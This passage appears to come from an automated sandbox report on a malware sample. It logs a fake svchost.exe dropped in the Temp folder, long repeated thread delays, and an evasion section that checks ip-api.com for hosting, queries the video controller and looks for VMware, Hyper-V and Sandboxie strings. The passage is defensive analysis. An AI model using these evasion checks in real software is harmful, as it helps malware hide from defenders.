                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Check if machine is in data center or colocation facility
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                            Source: C:\Windows\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Windows\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                            Source: StartMenuExperienceHost.exe, 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, StartMenuExperienceHost.exe, 0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe.4.dr, svchost.exe.12.drBinary or memory string: SBIEDLL.DLL
                            Source: C:\Windows\StartMenuExperienceHost.exeMemory allocated: 1270000 memory reserve | memory write watchJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeMemory allocated: 1AE20000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 3140000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 1B140000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 1550000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 1B1A0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: F80000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 1AAA0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: BB0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 1AAA0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 3200000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 1B200000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 15A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 1B1A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: FF0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 1AFA0000 memory reserve | memory write watch
                            Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 599563Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 599256Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 599115Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 599000Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 598889Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 598781Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 598671Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 598555Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 598451Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 598343Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 598232Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 598124Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 598016Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 597906Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 597797Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 597687Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 597578Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 597465Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 597359Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 597244Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 597137Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 597030Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 596917Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 596783Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 596298Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 596121Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 596014Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 595906Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 595797Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 595687Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 595577Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 595466Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 595356Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 595248Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 595139Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeWindow / User API: threadDelayed 9998Jump to behavior
                            Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 9392Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeWindow / User API: threadDelayed 3568Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeWindow / User API: threadDelayed 6256Jump to behavior
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeAPI coverage: 9.1 %
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -38738162554790034s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -600000s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -599563s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -599256s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -599115s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -599000s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -598889s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -598781s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -598671s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -598555s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -598451s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -598343s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -598232s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -598124s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -598016s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -597906s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -597797s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -597687s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -597578s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -597465s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -597359s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -597244s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -597137s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -597030s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -596917s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -596783s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -596298s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -596121s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -596014s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -595906s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -595797s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -595687s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -595577s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -595466s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -595356s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -595248s >= -30000sJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244Thread sleep time: -595139s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 7280Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 7452Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 7608Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 7688Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 8160Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 3028Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 7760Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 599563Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 599256Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 599115Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 599000Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 598889Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 598781Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 598671Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 598555Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 598451Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 598343Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 598232Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 598124Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 598016Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 597906Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 597797Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 597687Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 597578Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 597465Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 597359Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 597244Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 597137Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 597030Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 596917Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 596783Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 596298Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 596121Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 596014Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 595906Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 595797Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 595687Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 595577Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 595466Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 595356Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 595248Jump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 595139Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477
                            Source: StartMenuExperienceHost.exe, 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, StartMenuExperienceHost.exe.4.dr, svchost.exe.12.drBinary or memory string: gQeMuKYZfmdfalx
                            Source: svchost.exe, 00000007.00000002.3719577927.000002B128E64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                            Source: svchost.exe, 00000007.00000002.3719311899.000002B128E4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: svchost.exe.12.drBinary or memory string: vmware
                            Source: svchost.exe, 00000007.00000002.3719577927.000002B128E7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: svchost.exe, 00000007.00000002.3719130118.000002B128E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                            Source: StartMenuExperienceHost.exe, 0000000C.00000002.3724054665.000000001BD0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
